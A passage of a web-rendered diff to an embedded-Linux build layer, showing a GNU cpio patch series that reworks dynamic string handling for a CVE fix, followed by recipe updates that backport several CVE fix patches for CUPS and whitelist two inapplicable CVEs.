115 | -process_copy_in () | ||
116 | +process_copy_in (void) | ||
117 | { | ||
118 | char done = false; /* True if trailer reached. */ | ||
119 | FILE *tty_in = NULL; /* Interactive file for rename option. */ | ||
120 | diff --git a/src/copyout.c b/src/copyout.c | ||
121 | index 8b0beb6..26e3dda 100644 | ||
122 | --- a/src/copyout.c | ||
123 | +++ b/src/copyout.c | ||
124 | @@ -594,9 +594,10 @@ assign_string (char **pvar, char *value) | ||
125 | The format of the header depends on the compatibility (-c) flag. */ | ||
126 | |||
127 | void | ||
128 | -process_copy_out () | ||
129 | +process_copy_out (void) | ||
130 | { | ||
131 | - dynamic_string input_name; /* Name of file read from stdin. */ | ||
132 | + dynamic_string input_name = DYNAMIC_STRING_INITIALIZER; | ||
133 | + /* Name of file read from stdin. */ | ||
134 | struct stat file_stat; /* Stat record for file. */ | ||
135 | struct cpio_file_stat file_hdr = CPIO_FILE_STAT_INITIALIZER; | ||
136 | /* Output header information. */ | ||
137 | @@ -605,7 +606,6 @@ process_copy_out () | ||
138 | char *orig_file_name = NULL; | ||
139 | |||
140 | /* Initialize the copy out. */ | ||
141 | - ds_init (&input_name, 128); | ||
142 | file_hdr.c_magic = 070707; | ||
143 | |||
144 | /* Check whether the output file might be a tape. */ | ||
145 | @@ -657,14 +657,9 @@ process_copy_out () | ||
146 | { | ||
147 | if (file_hdr.c_mode & CP_IFDIR) | ||
148 | { | ||
149 | - int len = strlen (input_name.ds_string); | ||
150 | /* Make sure the name ends with a slash */ | ||
151 | - if (input_name.ds_string[len-1] != '/') | ||
152 | - { | ||
153 | - ds_resize (&input_name, len + 2); | ||
154 | - input_name.ds_string[len] = '/'; | ||
155 | - input_name.ds_string[len+1] = 0; | ||
156 | - } | ||
157 | + if (!ds_endswith (&input_name, '/')) | ||
158 | + ds_append (&input_name, '/'); | ||
159 | } | ||
160 | } | ||
161 | |||
162 | @@ -875,6 +870,7 @@ process_copy_out () | ||
163 | (unsigned long) blocks), (unsigned long) blocks); | ||
164 | } | ||
165 | cpio_file_stat_free (&file_hdr); | ||
166 | + ds_free (&input_name); | ||
167 | } | ||
168 | |||
169 | |||
170 | diff --git a/src/copypass.c b/src/copypass.c | ||
171 | index dc13b5b..62f31c6 100644 | ||
172 | --- a/src/copypass.c | ||
173 | +++ b/src/copypass.c | ||
174 | @@ -48,10 +48,12 @@ set_copypass_perms (int fd, const char *name, struct stat *st) | ||
175 | If `link_flag', link instead of copying. */ | ||
176 | |||
177 | void | ||
178 | -process_copy_pass () | ||
179 | +process_copy_pass (void) | ||
180 | { | ||
181 | - dynamic_string input_name; /* Name of file from stdin. */ | ||
182 | - dynamic_string output_name; /* Name of new file. */ | ||
183 | + dynamic_string input_name = DYNAMIC_STRING_INITIALIZER; | ||
184 | + /* Name of file from stdin. */ | ||
185 | + dynamic_string output_name = DYNAMIC_STRING_INITIALIZER; | ||
186 | + /* Name of new file. */ | ||
187 | size_t dirname_len; /* Length of `directory_name'. */ | ||
188 | int res; /* Result of functions. */ | ||
189 | char *slash; /* For moving past slashes in input name. */ | ||
190 | @@ -65,25 +67,18 @@ process_copy_pass () | ||
191 | created files */ | ||
192 | |||
193 | /* Initialize the copy pass. */ | ||
194 | - ds_init (&input_name, 128); | ||
195 | |||
196 | dirname_len = strlen (directory_name); | ||
197 | if (change_directory_option && !ISSLASH (directory_name[0])) | ||
198 | { | ||
199 | char *pwd = xgetcwd (); | ||
200 | - | ||
201 | - dirname_len += strlen (pwd) + 1; | ||
202 | - ds_init (&output_name, dirname_len + 2); | ||
203 | - strcpy (output_name.ds_string, pwd); | ||
204 | - strcat (output_name.ds_string, "/"); | ||
205 | - strcat (output_name.ds_string, directory_name); | ||
206 | + | ||
207 | + ds_concat (&output_name, pwd); | ||
208 | + ds_append (&output_name, '/'); | ||
209 | } | ||
210 | - else | ||
211 | - { | ||
212 | - ds_init (&output_name, dirname_len + 2); | ||
213 | - strcpy (output_name.ds_string, directory_name); | ||
214 | - } | ||
215 | - output_name.ds_string[dirname_len] = '/'; | ||
216 | + ds_concat (&output_name, directory_name); | ||
217 | + ds_append (&output_name, '/'); | ||
218 | + dirname_len = ds_len (&output_name); | ||
219 | output_is_seekable = true; | ||
220 | |||
221 | change_dir (); | ||
222 | @@ -116,8 +111,8 @@ process_copy_pass () | ||
223 | /* Make the name of the new file. */ | ||
224 | for (slash = input_name.ds_string; *slash == '/'; ++slash) | ||
225 | ; | ||
226 | - ds_resize (&output_name, dirname_len + strlen (slash) + 2); | ||
227 | - strcpy (output_name.ds_string + dirname_len + 1, slash); | ||
228 | + ds_reset (&output_name, dirname_len); | ||
229 | + ds_concat (&output_name, slash); | ||
230 | |||
231 | existing_dir = false; | ||
232 | if (lstat (output_name.ds_string, &out_file_stat) == 0) | ||
233 | @@ -333,6 +328,9 @@ process_copy_pass () | ||
234 | (unsigned long) blocks), | ||
235 | (unsigned long) blocks); | ||
236 | } | ||
237 | + | ||
238 | + ds_free (&input_name); | ||
239 | + ds_free (&output_name); | ||
240 | } | ||
241 | |||
242 | /* Try and create a hard link from FILE_NAME to another file | ||
243 | diff --git a/src/dstring.c b/src/dstring.c | ||
244 | index e9c063f..358f356 100644 | ||
245 | --- a/src/dstring.c | ||
246 | +++ b/src/dstring.c | ||
247 | @@ -20,8 +20,8 @@ | ||
248 | #if defined(HAVE_CONFIG_H) | ||
249 | # include <config.h> | ||
250 | #endif | ||
251 | - | ||
252 | #include <stdio.h> | ||
253 | +#include <stdlib.h> | ||
254 | #if defined(HAVE_STRING_H) || defined(STDC_HEADERS) | ||
255 | #include <string.h> | ||
256 | #else | ||
257 | @@ -33,24 +33,41 @@ | ||
258 | /* Initialiaze dynamic string STRING with space for SIZE characters. */ | ||
259 | |||
260 | void | ||
261 | -ds_init (dynamic_string *string, int size) | ||
262 | +ds_init (dynamic_string *string) | ||
263 | +{ | ||
264 | + memset (string, 0, sizeof *string); | ||
265 | +} | ||
266 | + | ||
267 | +/* Free the dynamic string storage. */ | ||
268 | + | ||
269 | +void | ||
270 | +ds_free (dynamic_string *string) | ||
271 | { | ||
272 | - string->ds_length = size; | ||
273 | - string->ds_string = (char *) xmalloc (size); | ||
274 | + free (string->ds_string); | ||
275 | } | ||
276 | |||
277 | -/* Expand dynamic string STRING, if necessary, to hold SIZE characters. */ | ||
278 | +/* Expand dynamic string STRING, if necessary. */ | ||
279 | |||
280 | void | ||
281 | -ds_resize (dynamic_string *string, int size) | ||
282 | +ds_resize (dynamic_string *string) | ||
283 | { | ||
284 | - if (size > string->ds_length) | ||
285 | + if (string->ds_idx == string->ds_size) | ||
286 | { | ||
287 | - string->ds_length = size; | ||
288 | - string->ds_string = (char *) xrealloc ((char *) string->ds_string, size); | ||
289 | + string->ds_string = x2nrealloc (string->ds_string, &string->ds_size, | ||
290 | + 1); | ||
291 | } | ||
292 | } | ||
293 | |||
294 | +/* Reset the index of the dynamic string S to LEN. */ | ||
295 | + | ||
296 | +void | ||
297 | +ds_reset (dynamic_string *s, size_t len) | ||
298 | +{ | ||
299 | + while (len > s->ds_size) | ||
300 | + ds_resize (s); | ||
301 | + s->ds_idx = len; | ||
302 | +} | ||
303 | + | ||
304 | /* Dynamic string S gets a string terminated by the EOS character | ||
305 | (which is removed) from file F. S will increase | ||
306 | in size during the function if the string from F is longer than | ||
307 | @@ -61,34 +78,50 @@ ds_resize (dynamic_string *string, int size) | ||
308 | char * | ||
309 | ds_fgetstr (FILE *f, dynamic_string *s, char eos) | ||
310 | { | ||
311 | - int insize; /* Amount needed for line. */ | ||
312 | - int strsize; /* Amount allocated for S. */ | ||
313 | int next_ch; | ||
314 | |||
315 | /* Initialize. */ | ||
316 | - insize = 0; | ||
317 | - strsize = s->ds_length; | ||
318 | + s->ds_idx = 0; | ||
319 | |||
320 | /* Read the input string. */ | ||
321 | - next_ch = getc (f); | ||
322 | - while (next_ch != eos && next_ch != EOF) | ||
323 | + while ((next_ch = getc (f)) != eos && next_ch != EOF) | ||
324 | { | ||
325 | - if (insize >= strsize - 1) | ||
326 | - { | ||
327 | - ds_resize (s, strsize * 2 + 2); | ||
328 | - strsize = s->ds_length; | ||
329 | - } | ||
330 | - s->ds_string[insize++] = next_ch; | ||
331 | - next_ch = getc (f); | ||
332 | + ds_resize (s); | ||
333 | + s->ds_string[s->ds_idx++] = next_ch; | ||
334 | } | ||
335 | - s->ds_string[insize++] = '\0'; | ||
336 | + ds_resize (s); | ||
337 | + s->ds_string[s->ds_idx] = '\0'; | ||
338 | |||
339 | - if (insize == 1 && next_ch == EOF) | ||
340 | + if (s->ds_idx == 0 && next_ch == EOF) | ||
341 | return NULL; | ||
342 | else | ||
343 | return s->ds_string; | ||
344 | } | ||
345 | |||
346 | +void | ||
347 | +ds_append (dynamic_string *s, int c) | ||
348 | +{ | ||
349 | + ds_resize (s); | ||
350 | + s->ds_string[s->ds_idx] = c; | ||
351 | + if (c) | ||
352 | + { | ||
353 | + s->ds_idx++; | ||
354 | + ds_resize (s); | ||
355 | + s->ds_string[s->ds_idx] = 0; | ||
356 | + } | ||
357 | +} | ||
358 | + | ||
359 | +void | ||
360 | +ds_concat (dynamic_string *s, char const *str) | ||
361 | +{ | ||
362 | + size_t len = strlen (str); | ||
363 | + while (len + 1 > s->ds_size) | ||
364 | + ds_resize (s); | ||
365 | + memcpy (s->ds_string + s->ds_idx, str, len); | ||
366 | + s->ds_idx += len; | ||
367 | + s->ds_string[s->ds_idx] = 0; | ||
368 | +} | ||
369 | + | ||
370 | char * | ||
371 | ds_fgets (FILE *f, dynamic_string *s) | ||
372 | { | ||
373 | @@ -100,3 +133,10 @@ ds_fgetname (FILE *f, dynamic_string *s) | ||
374 | { | ||
375 | return ds_fgetstr (f, s, '\0'); | ||
376 | } | ||
377 | + | ||
378 | +/* Return true if the dynamic string S ends with character C. */ | ||
379 | +int | ||
380 | +ds_endswith (dynamic_string *s, int c) | ||
381 | +{ | ||
382 | + return (s->ds_idx > 0 && s->ds_string[s->ds_idx - 1] == c); | ||
383 | +} | ||
384 | diff --git a/src/dstring.h b/src/dstring.h | ||
385 | index b5135fe..f5b04ef 100644 | ||
386 | --- a/src/dstring.h | ||
387 | +++ b/src/dstring.h | ||
388 | @@ -17,10 +17,6 @@ | ||
389 | Software Foundation, Inc., 51 Franklin Street, Fifth Floor, | ||
390 | Boston, MA 02110-1301 USA. */ | ||
391 | |||
392 | -#ifndef NULL | ||
393 | -#define NULL 0 | ||
394 | -#endif | ||
395 | - | ||
396 | /* A dynamic string consists of record that records the size of an | ||
397 | allocated string and the pointer to that string. The actual string | ||
398 | is a normal zero byte terminated string that can be used with the | ||
399 | @@ -30,22 +26,25 @@ | ||
400 | |||
401 | typedef struct | ||
402 | { | ||
403 | - int ds_length; /* Actual amount of storage allocated. */ | ||
404 | - char *ds_string; /* String. */ | ||
405 | + size_t ds_size; /* Actual amount of storage allocated. */ | ||
406 | + size_t ds_idx; /* Index of the next free byte in the string. */ | ||
407 | + char *ds_string; /* String storage. */ | ||
408 | } dynamic_string; | ||
409 | |||
410 | +#define DYNAMIC_STRING_INITIALIZER { 0, 0, NULL } | ||
411 | |||
412 | -/* Macros that look similar to the original string functions. | ||
413 | - WARNING: These macros work only on pointers to dynamic string records. | ||
414 | - If used with a real record, an "&" must be used to get the pointer. */ | ||
415 | -#define ds_strlen(s) strlen ((s)->ds_string) | ||
416 | -#define ds_strcmp(s1, s2) strcmp ((s1)->ds_string, (s2)->ds_string) | ||
417 | -#define ds_strncmp(s1, s2, n) strncmp ((s1)->ds_string, (s2)->ds_string, n) | ||
418 | -#define ds_index(s, c) index ((s)->ds_string, c) | ||
419 | -#define ds_rindex(s, c) rindex ((s)->ds_string, c) | ||
420 | +void ds_init (dynamic_string *string); | ||
421 | +void ds_free (dynamic_string *string); | ||
422 | +void ds_reset (dynamic_string *s, size_t len); | ||
423 | |||
424 | -void ds_init (dynamic_string *string, int size); | ||
425 | -void ds_resize (dynamic_string *string, int size); | ||
426 | +/* All functions below guarantee that s->ds_string[s->ds_idx] == '\0' */ | ||
427 | char *ds_fgetname (FILE *f, dynamic_string *s); | ||
428 | char *ds_fgets (FILE *f, dynamic_string *s); | ||
429 | char *ds_fgetstr (FILE *f, dynamic_string *s, char eos); | ||
430 | +void ds_append (dynamic_string *s, int c); | ||
431 | +void ds_concat (dynamic_string *s, char const *str); | ||
432 | + | ||
433 | +#define ds_len(s) ((s)->ds_idx) | ||
434 | + | ||
435 | +int ds_endswith (dynamic_string *s, int c); | ||
436 | + | ||
437 | diff --git a/src/util.c b/src/util.c | ||
438 | index 4421b20..6d6bbaa 100644 | ||
439 | --- a/src/util.c | ||
440 | +++ b/src/util.c | ||
441 | @@ -846,11 +846,9 @@ get_next_reel (int tape_des) | ||
442 | FILE *tty_out; /* File for interacting with user. */ | ||
443 | int old_tape_des; | ||
444 | char *next_archive_name; | ||
445 | - dynamic_string new_name; | ||
446 | + dynamic_string new_name = DYNAMIC_STRING_INITIALIZER; | ||
447 | char *str_res; | ||
448 | |||
449 | - ds_init (&new_name, 128); | ||
450 | - | ||
451 | /* Open files for interactive communication. */ | ||
452 | tty_in = fopen (TTY_NAME, "r"); | ||
453 | if (tty_in == NULL) | ||
454 | @@ -925,7 +923,7 @@ get_next_reel (int tape_des) | ||
455 | error (PAXEXIT_FAILURE, 0, _("internal error: tape descriptor changed from %d to %d"), | ||
456 | old_tape_des, tape_des); | ||
457 | |||
458 | - free (new_name.ds_string); | ||
459 | + ds_free (&new_name); | ||
460 | fclose (tty_in); | ||
461 | fclose (tty_out); | ||
462 | } | ||
463 | -- | ||
464 | 2.25.1 | ||
465 | |||
466 | |||
467 | From fb7a51bf85b8e6f045cacb4fb783db4a414741bf Mon Sep 17 00:00:00 2001 | ||
468 | From: Sergey Poznyakoff <gray@gnu.org> | ||
469 | Date: Wed, 11 Aug 2021 18:10:38 +0300 | ||
470 | Subject: [PATCH 2/3] Fix previous commit | ||
471 | |||
472 | * src/dstring.c (ds_reset,ds_concat): Don't call ds_resize in a | ||
473 | loop. | ||
474 | --- | ||
475 | src/dstring.c | 4 ++-- | ||
476 | 1 file changed, 2 insertions(+), 2 deletions(-) | ||
477 | |||
478 | diff --git a/src/dstring.c b/src/dstring.c | ||
479 | index 358f356..90c691c 100644 | ||
480 | --- a/src/dstring.c | ||
481 | +++ b/src/dstring.c | ||
482 | @@ -64,7 +64,7 @@ void | ||
483 | ds_reset (dynamic_string *s, size_t len) | ||
484 | { | ||
485 | while (len > s->ds_size) | ||
486 | - ds_resize (s); | ||
487 | + s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1); | ||
488 | s->ds_idx = len; | ||
489 | } | ||
490 | |||
491 | @@ -116,7 +116,7 @@ ds_concat (dynamic_string *s, char const *str) | ||
492 | { | ||
493 | size_t len = strlen (str); | ||
494 | while (len + 1 > s->ds_size) | ||
495 | - ds_resize (s); | ||
496 | + s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1); | ||
497 | memcpy (s->ds_string + s->ds_idx, str, len); | ||
498 | s->ds_idx += len; | ||
499 | s->ds_string[s->ds_idx] = 0; | ||
500 | -- | ||
501 | 2.25.1 | ||
502 | |||
503 | |||
504 | From 86b37d74b15f9bb5fe62fd1642cc126d3ace0189 Mon Sep 17 00:00:00 2001 | ||
505 | From: Sergey Poznyakoff <gray@gnu.org> | ||
506 | Date: Wed, 18 Aug 2021 09:41:39 +0300 | ||
507 | Subject: [PATCH 3/3] Fix dynamic string reallocations | ||
508 | |||
509 | * src/dstring.c (ds_resize): Take additional argument: number of | ||
510 | bytes to leave available after ds_idx. All uses changed. | ||
511 | --- | ||
512 | src/dstring.c | 18 ++++++++---------- | ||
513 | 1 file changed, 8 insertions(+), 10 deletions(-) | ||
514 | |||
515 | diff --git a/src/dstring.c b/src/dstring.c | ||
516 | index 90c691c..0f597cc 100644 | ||
517 | --- a/src/dstring.c | ||
518 | +++ b/src/dstring.c | ||
519 | @@ -49,9 +49,9 @@ ds_free (dynamic_string *string) | ||
520 | /* Expand dynamic string STRING, if necessary. */ | ||
521 | |||
522 | void | ||
523 | -ds_resize (dynamic_string *string) | ||
524 | +ds_resize (dynamic_string *string, size_t len) | ||
525 | { | ||
526 | - if (string->ds_idx == string->ds_size) | ||
527 | + while (len + string->ds_idx >= string->ds_size) | ||
528 | { | ||
529 | string->ds_string = x2nrealloc (string->ds_string, &string->ds_size, | ||
530 | 1); | ||
531 | @@ -63,8 +63,7 @@ ds_resize (dynamic_string *string) | ||
532 | void | ||
533 | ds_reset (dynamic_string *s, size_t len) | ||
534 | { | ||
535 | - while (len > s->ds_size) | ||
536 | - s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1); | ||
537 | + ds_resize (s, len); | ||
538 | s->ds_idx = len; | ||
539 | } | ||
540 | |||
541 | @@ -86,10 +85,10 @@ ds_fgetstr (FILE *f, dynamic_string *s, char eos) | ||
542 | /* Read the input string. */ | ||
543 | while ((next_ch = getc (f)) != eos && next_ch != EOF) | ||
544 | { | ||
545 | - ds_resize (s); | ||
546 | + ds_resize (s, 0); | ||
547 | s->ds_string[s->ds_idx++] = next_ch; | ||
548 | } | ||
549 | - ds_resize (s); | ||
550 | + ds_resize (s, 0); | ||
551 | s->ds_string[s->ds_idx] = '\0'; | ||
552 | |||
553 | if (s->ds_idx == 0 && next_ch == EOF) | ||
554 | @@ -101,12 +100,12 @@ ds_fgetstr (FILE *f, dynamic_string *s, char eos) | ||
555 | void | ||
556 | ds_append (dynamic_string *s, int c) | ||
557 | { | ||
558 | - ds_resize (s); | ||
559 | + ds_resize (s, 0); | ||
560 | s->ds_string[s->ds_idx] = c; | ||
561 | if (c) | ||
562 | { | ||
563 | s->ds_idx++; | ||
564 | - ds_resize (s); | ||
565 | + ds_resize (s, 0); | ||
566 | s->ds_string[s->ds_idx] = 0; | ||
567 | } | ||
568 | } | ||
569 | @@ -115,8 +114,7 @@ void | ||
570 | ds_concat (dynamic_string *s, char const *str) | ||
571 | { | ||
572 | size_t len = strlen (str); | ||
573 | - while (len + 1 > s->ds_size) | ||
574 | - s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1); | ||
575 | + ds_resize (s, len); | ||
576 | memcpy (s->ds_string + s->ds_idx, str, len); | ||
577 | s->ds_idx += len; | ||
578 | s->ds_string[s->ds_idx] = 0; | ||
579 | -- | ||
580 | 2.25.1 | ||
581 | |||
diff --git a/meta/recipes-extended/cpio/cpio_2.13.bb b/meta/recipes-extended/cpio/cpio_2.13.bb index 9e35a80f8b..5ab567f360 100644 --- a/meta/recipes-extended/cpio/cpio_2.13.bb +++ b/meta/recipes-extended/cpio/cpio_2.13.bb | |||
@@ -9,6 +9,9 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=f27defe1e96c2e1ecd4e0c9be8967949" | |||
9 | SRC_URI = "${GNU_MIRROR}/cpio/cpio-${PV}.tar.gz \ | 9 | SRC_URI = "${GNU_MIRROR}/cpio/cpio-${PV}.tar.gz \ |
10 | file://0001-Unset-need_charset_alias-when-building-for-musl.patch \ | 10 | file://0001-Unset-need_charset_alias-when-building-for-musl.patch \ |
11 | file://0002-src-global.c-Remove-superfluous-declaration-of-progr.patch \ | 11 | file://0002-src-global.c-Remove-superfluous-declaration-of-progr.patch \ |
12 | file://CVE-2021-38185.patch \ | ||
13 | file://0003-Fix-calculation-of-CRC-in-copy-out-mode.patch \ | ||
14 | file://0004-Fix-appending-to-archives-bigger-than-2G.patch \ | ||
12 | " | 15 | " |
13 | 16 | ||
14 | SRC_URI[md5sum] = "389c5452d667c23b5eceb206f5000810" | 17 | SRC_URI[md5sum] = "389c5452d667c23b5eceb206f5000810" |
@@ -16,6 +19,9 @@ SRC_URI[sha256sum] = "e87470d9c984317f658567c03bfefb6b0c829ff17dbf6b0de48d71a4c8 | |||
16 | 19 | ||
17 | inherit autotools gettext texinfo | 20 | inherit autotools gettext texinfo |
18 | 21 | ||
22 | # Issue applies to use of cpio in SUSE/OBS, doesn't apply to us | ||
23 | CVE_CHECK_WHITELIST += "CVE-2010-4226" | ||
24 | |||
19 | EXTRA_OECONF += "DEFAULT_RMT_DIR=${sbindir}" | 25 | EXTRA_OECONF += "DEFAULT_RMT_DIR=${sbindir}" |
20 | 26 | ||
21 | do_install () { | 27 | do_install () { |
diff --git a/meta/recipes-extended/cracklib/cracklib_2.9.5.bb b/meta/recipes-extended/cracklib/cracklib_2.9.5.bb index 82995219dc..9cdb71f1a1 100644 --- a/meta/recipes-extended/cracklib/cracklib_2.9.5.bb +++ b/meta/recipes-extended/cracklib/cracklib_2.9.5.bb | |||
@@ -1,5 +1,6 @@ | |||
1 | SUMMARY = "Password strength checker library" | 1 | SUMMARY = "Password strength checker library" |
2 | HOMEPAGE = "http://sourceforge.net/projects/cracklib" | 2 | HOMEPAGE = "https://github.com/cracklib/cracklib" |
3 | DESCRIPTION = "${SUMMARY}" | ||
3 | 4 | ||
4 | LICENSE = "LGPLv2.1+" | 5 | LICENSE = "LGPLv2.1+" |
5 | LIC_FILES_CHKSUM = "file://COPYING.LIB;md5=e3eda01d9815f8d24aae2dbd89b68b06" | 6 | LIC_FILES_CHKSUM = "file://COPYING.LIB;md5=e3eda01d9815f8d24aae2dbd89b68b06" |
diff --git a/meta/recipes-extended/cups/cups.inc b/meta/recipes-extended/cups/cups.inc index f6d54c7cf2..6cfe314f20 100644 --- a/meta/recipes-extended/cups/cups.inc +++ b/meta/recipes-extended/cups/cups.inc | |||
@@ -13,6 +13,11 @@ SRC_URI = "https://github.com/apple/cups/releases/download/v${PV}/${BP}-source.t | |||
13 | file://0002-don-t-try-to-run-generated-binaries.patch \ | 13 | file://0002-don-t-try-to-run-generated-binaries.patch \ |
14 | file://0003-cups_1.4.6.bb-Fix-build-on-ppc64.patch \ | 14 | file://0003-cups_1.4.6.bb-Fix-build-on-ppc64.patch \ |
15 | file://0004-cups-fix-multilib-install-file-conflicts.patch\ | 15 | file://0004-cups-fix-multilib-install-file-conflicts.patch\ |
16 | file://CVE-2022-26691.patch \ | ||
17 | file://CVE-2023-32324.patch \ | ||
18 | file://CVE-2023-34241.patch \ | ||
19 | file://CVE-2023-32360.patch \ | ||
20 | file://CVE-2023-4504.patch \ | ||
16 | " | 21 | " |
17 | 22 | ||
18 | UPSTREAM_CHECK_URI = "https://github.com/apple/cups/releases" | 23 | UPSTREAM_CHECK_URI = "https://github.com/apple/cups/releases" |
@@ -41,7 +46,7 @@ PACKAGECONFIG ??= "${@bb.utils.contains('DISTRO_FEATURES', 'zeroconf', 'avahi', | |||
41 | PACKAGECONFIG[avahi] = "--enable-avahi,--disable-avahi,avahi" | 46 | PACKAGECONFIG[avahi] = "--enable-avahi,--disable-avahi,avahi" |
42 | PACKAGECONFIG[acl] = "--enable-acl,--disable-acl,acl" | 47 | PACKAGECONFIG[acl] = "--enable-acl,--disable-acl,acl" |
43 | PACKAGECONFIG[pam] = "--enable-pam --with-pam-module=unix, --disable-pam, libpam" | 48 | PACKAGECONFIG[pam] = "--enable-pam --with-pam-module=unix, --disable-pam, libpam" |
44 | PACKAGECONFIG[systemd] = "--with-systemd=${systemd_system_unitdir},--without-systemd,systemd" | 49 | PACKAGECONFIG[systemd] = "--with-systemd=${systemd_system_unitdir},--disable-systemd,systemd" |
45 | PACKAGECONFIG[xinetd] = "--with-xinetd=${sysconfdir}/xinetd.d,--without-xinetd,xinetd" | 50 | PACKAGECONFIG[xinetd] = "--with-xinetd=${sysconfdir}/xinetd.d,--without-xinetd,xinetd" |
46 | 51 | ||
47 | EXTRA_OECONF = " \ | 52 | EXTRA_OECONF = " \ |
@@ -52,6 +57,9 @@ EXTRA_OECONF = " \ | |||
52 | --enable-debug \ | 57 | --enable-debug \ |
53 | --disable-relro \ | 58 | --disable-relro \ |
54 | --enable-libusb \ | 59 | --enable-libusb \ |
60 | --with-system-groups=lpadmin \ | ||
61 | --with-cups-group=lp \ | ||
62 | --with-domainsocket=/run/cups/cups.sock \ | ||
55 | DSOFLAGS='${LDFLAGS}' \ | 63 | DSOFLAGS='${LDFLAGS}' \ |
56 | " | 64 | " |
57 | 65 | ||
@@ -113,3 +121,7 @@ SYSROOT_PREPROCESS_FUNCS += "cups_sysroot_preprocess" | |||
113 | cups_sysroot_preprocess () { | 121 | cups_sysroot_preprocess () { |
114 | sed -i ${SYSROOT_DESTDIR}${bindir_crossscripts}/cups-config -e 's:cups_datadir=.*:cups_datadir=${datadir}/cups:' -e 's:cups_serverbin=.*:cups_serverbin=${libexecdir}/cups:' | 122 | sed -i ${SYSROOT_DESTDIR}${bindir_crossscripts}/cups-config -e 's:cups_datadir=.*:cups_datadir=${datadir}/cups:' -e 's:cups_serverbin=.*:cups_serverbin=${libexecdir}/cups:' |
115 | } | 123 | } |
124 | |||
125 | # -25317 concerns /var/log/cups having lp ownership. Our /var/log/cups is | ||
126 | # root:root, so this doesn't apply. | ||
127 | CVE_CHECK_WHITELIST += "CVE-2021-25317" | ||
diff --git a/meta/recipes-extended/cups/cups/CVE-2022-26691.patch b/meta/recipes-extended/cups/cups/CVE-2022-26691.patch new file mode 100644 index 0000000000..1fa5a54c70 --- /dev/null +++ b/meta/recipes-extended/cups/cups/CVE-2022-26691.patch | |||
@@ -0,0 +1,33 @@ | |||
1 | From de4f8c196106033e4c372dce3e91b9d42b0b9444 Mon Sep 17 00:00:00 2001 | ||
2 | From: Zdenek Dohnal <zdohnal@redhat.com> | ||
3 | Date: Thu, 26 May 2022 06:27:04 +0200 | ||
4 | Subject: [PATCH] scheduler/cert.c: Fix string comparison (fixes | ||
5 | CVE-2022-26691) | ||
6 | |||
7 | The previous algorithm didn't expect the strings can have a different | ||
8 | length, so one string can be a substring of the other and such substring | ||
9 | was reported as equal to the longer string. | ||
10 | |||
11 | CVE: CVE-2022-26691 | ||
12 | Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/de4f8c196106033e4c372dce3e91b9d42b0b9444] | ||
13 | Signed-off-by: Steve Sakoman | ||
14 | |||
15 | --- | ||
16 | diff --git a/scheduler/cert.c b/scheduler/cert.c | ||
17 | index b268bf1b2..9b65b96c9 100644 | ||
18 | --- a/scheduler/cert.c | ||
19 | +++ b/scheduler/cert.c | ||
20 | @@ -434,5 +434,12 @@ ctcompare(const char *a, /* I - First string */ | ||
21 | b ++; | ||
22 | } | ||
23 | |||
24 | - return (result); | ||
25 | + /* | ||
26 | + * The while loop finishes when *a == '\0' or *b == '\0' | ||
27 | + * so after the while loop either both *a and *b == '\0', | ||
28 | + * or one points inside a string, so when we apply logical OR on *a, | ||
29 | + * *b and result, we get a non-zero return value if the compared strings don't match. | ||
30 | + */ | ||
31 | + | ||
32 | + return (result | *a | *b); | ||
33 | } | ||
diff --git a/meta/recipes-extended/cups/cups/CVE-2023-32324.patch b/meta/recipes-extended/cups/cups/CVE-2023-32324.patch new file mode 100644 index 0000000000..40b89c9899 --- /dev/null +++ b/meta/recipes-extended/cups/cups/CVE-2023-32324.patch | |||
@@ -0,0 +1,36 @@ | |||
1 | From 07cbffd11107eed3aaf1c64e35552aec20f792da Mon Sep 17 00:00:00 2001 | ||
2 | From: Zdenek Dohnal <zdohnal@redhat.com> | ||
3 | Date: Thu, 1 Jun 2023 12:04:00 +0200 | ||
4 | Subject: [PATCH] cups/string.c: Return if `size` is 0 (fixes CVE-2023-32324) | ||
5 | |||
6 | CVE: CVE-2023-32324 | ||
7 | Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/fd8bc2d32589] | ||
8 | |||
9 | (cherry picked from commit fd8bc2d32589d1fd91fe1c0521be2a7c0462109e) | ||
10 | Signed-off-by: Sanjay Chitroda <schitrod@cisco.com> | ||
11 | --- | ||
12 | cups/string.c | 4 ++++ | ||
13 | 1 file changed, 4 insertions(+) | ||
14 | |||
15 | diff --git a/cups/string.c b/cups/string.c | ||
16 | index 93cdad19..6ef58515 100644 | ||
17 | --- a/cups/string.c | ||
18 | +++ b/cups/string.c | ||
19 | @@ -1,6 +1,7 @@ | ||
20 | /* | ||
21 | * String functions for CUPS. | ||
22 | * | ||
23 | + * Copyright © 2023 by OpenPrinting. | ||
24 | * Copyright © 2007-2019 by Apple Inc. | ||
25 | * Copyright © 1997-2007 by Easy Software Products. | ||
26 | * | ||
27 | @@ -730,6 +731,9 @@ _cups_strlcpy(char *dst, /* O - Destination string */ | ||
28 | size_t srclen; /* Length of source string */ | ||
29 | |||
30 | |||
31 | + if (size == 0) | ||
32 | + return (0); | ||
33 | + | ||
34 | /* | ||
35 | * Figure out how much room is needed... | ||
36 | */ | ||
diff --git a/meta/recipes-extended/cups/cups/CVE-2023-32360.patch b/meta/recipes-extended/cups/cups/CVE-2023-32360.patch new file mode 100644 index 0000000000..4d39e1e57f --- /dev/null +++ b/meta/recipes-extended/cups/cups/CVE-2023-32360.patch | |||
@@ -0,0 +1,31 @@ | |||
1 | From a0c8b9c9556882f00c68b9727a95a1b6d1452913 Mon Sep 17 00:00:00 2001 | ||
2 | From: Michael R Sweet <michael.r.sweet@gmail.com> | ||
3 | Date: Tue, 6 Dec 2022 09:04:01 -0500 | ||
4 | Subject: [PATCH] Require authentication for CUPS-Get-Document. | ||
5 | |||
6 | Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/a0c8b9c9556882f00c68b9727a95a1b6d1452913] | ||
7 | CVE: CVE-2023-32360 | ||
8 | Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> | ||
9 | --- | ||
10 | conf/cupsd.conf.in | 8 +++++++- | ||
11 | 1 file changed, 7 insertions(+), 1 deletion(-) | ||
12 | |||
13 | diff --git a/conf/cupsd.conf.in b/conf/cupsd.conf.in | ||
14 | index b258849078..a07536f3e4 100644 | ||
